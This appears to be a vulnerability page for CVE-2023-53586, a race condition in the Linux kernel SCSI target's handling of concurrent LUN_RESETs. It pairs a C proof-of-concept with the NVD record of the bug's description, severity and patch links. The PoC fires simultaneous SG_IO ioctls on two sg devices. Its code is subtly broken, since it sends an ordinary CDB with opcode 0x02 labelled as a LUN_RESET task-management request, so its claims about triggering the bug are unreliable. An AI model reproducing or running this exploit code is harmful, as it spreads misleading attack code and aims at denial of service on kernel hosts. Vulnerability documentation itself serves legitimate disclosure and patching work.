CVE-2023-53586

// PoC for CVE-2023-53586: Linux kernel SCSI target multiple LUN_RESET race condition // This PoC demonstrates the trigger conditions for the vulnerability. // Note: Requires SCSI target setup with two sessions and running I/O commands. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <pthread.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <scsi/sg.h> #include <scsi/scsi.h> // Simulated SCSI device paths for two sessions #define SESSION1_DEV "/dev/sg0" #define SESSION2_DEV "/dev/sg1" // Send LUN_RESET task management function int send_lun_reset(int fd) { unsigned char sense_buffer[32]; unsigned char data_buffer[1024]; sg_io_hdr_t io_hdr; memset(&io_hdr, 0, sizeof(sg_io_hdr_t)); memset(sense_buffer, 0, sizeof(sense_buffer)); memset(data_buffer, 0, sizeof(data_buffer)); // TASK MANAGEMENT function for LUN_RESET (0x02) unsigned char tm_data[8] = {0x02, 0, 0, 0, 0, 0, 0, 0}; io_hdr.interface_id = 'S'; io_hdr.cmd_len = sizeof(tm_data); io_hdr.mx_sb_len = sizeof(sense_buffer); io_hdr.dxfer_direction = SG_DXFER_NONE; io_hdr.dxfer_len = 0; io_hdr.dxferp = data_buffer; io_hdr.cmdp = tm_data; io_hdr.sbp = sense_buffer; io_hdr.timeout = 30000; return ioctl(fd, SG_IO, &io_hdr); } // Thread function to send LUN_RESET on session1 void* session1_reset(void* arg) { int fd = open(SESSION1_DEV, O_RDWR); if (fd < 0) { perror("Failed to open session1 device"); return NULL; } printf("Session1: Sending LUN_RESET...\n"); send_lun_reset(fd); printf("Session1: LUN_RESET completed\n"); close(fd); return NULL; } // Thread function to send LUN_RESET on session2 void* session2_reset(void* arg) { int fd = open(SESSION2_DEV, O_RDWR); if (fd < 0) { perror("Failed to open session2 device"); return NULL; } printf("Session2: Sending LUN_RESET...\n"); send_lun_reset(fd); printf("Session2: LUN_RESET completed\n"); close(fd); return NULL; } int main(int argc, char* argv[]) { pthread_t thread1, thread2; printf("CVE-2023-53586 PoC: Triggering race condition with concurrent LUN_RESET\n"); printf("Prerequisites:\n"); printf("1. Linux kernel with SCSI target configured\n"); printf("2. Two active sessions with running I/O commands\n"); printf("3. Affected kernel version (pre-patch)\n\n"); // Create two threads to send concurrent LUN_RESET if (pthread_create(&thread1, NULL, session1_reset, NULL) != 0) { perror("Failed to create thread1"); return 1; } if (pthread_create(&thread2, NULL, session2_reset, NULL) != 0) { perror("Failed to create thread2"); return 1; } pthread_join(thread1, NULL); pthread_join(thread2, NULL); printf("\nExpected behavior on vulnerable kernel:\n"); printf("- session2 LUN_RESET returns success without cleaning commands\n"); printf("- Initiator may see invalid ITT errors or task lookup failures\n"); printf("- Potential deadlock between concurrent LUN_RESET operations\n"); return 0; }

{"cve": {"id": "CVE-2023-53586", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:54.837", "lastModified": "2026-03-23T18:36:13.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: Fix multiple LUN_RESET handling\n\nThis fixes a bug where an initiator thinks a LUN_RESET has cleaned up\nrunning commands when it hasn't. The bug was added in commit 51ec502a3266\n(\"target: Delete tmr from list before processing\").\n\nThe problem occurs when:\n\n 1. We have N I/O cmds running in the target layer spread over 2 sessions.\n\n 2. The initiator sends a LUN_RESET for each session.\n\n 3. session1's LUN_RESET loops over all the running commands from both\n sessions and moves them to its local drain_task_list.\n\n 4. session2's LUN_RESET does not see the LUN_RESET from session1 because\n the commit above has it remove itself. session2 also does not see any\n commands since the other reset moved them off the state lists.\n\n 5. sessions2's LUN_RESET will then complete with a successful response.\n\n 6. sessions2's inititor believes the running commands on its session are\n now cleaned up due to the successful response and cleans up the running\n commands from its side. It then restarts them.\n\n 7. The commands do eventually complete on the backend and the target\n starts to return aborted task statuses for them. The initiator will\n either throw a invalid ITT error or might accidentally lookup a new\n task if the ITT has been reallocated already.\n\nFix the bug by reverting the patch, and serialize the execution of\nLUN_RESETs and Preempt and Aborts.\n\nAlso prevent us from waiting on LUN_RESETs in core_tmr_drain_tmr_list,\nbecause it turns out the original patch fixed a bug that was not\nmentioned. For LUN_RESET1 core_tmr_drain_tmr_list can see a second\nLUN_RESET and wait on it. Then the second reset will run\ncore_tmr_drain_tmr_list and see the first reset and wait on it resulting in\na deadlock."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.11", "versionEndExcluding": "5.10.180", "matchCriteriaId": "042E4913-746E-4500-AE83-195FDEA50065"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c43de56f9220dca3e28c774d1c5e2cab574223a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/673db054d7a2b5a470d7a25baf65956d005ad729", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9158c86fd3237acaea8f0181c7836d90fd6eea10", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e1f59cd18a10969d08a082264b557876ca38766e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/eacfe32c3650bfd0e54224d160c431013d7f6998", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ed18526289b5603bf2253dee50f1d7ec245cf397", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}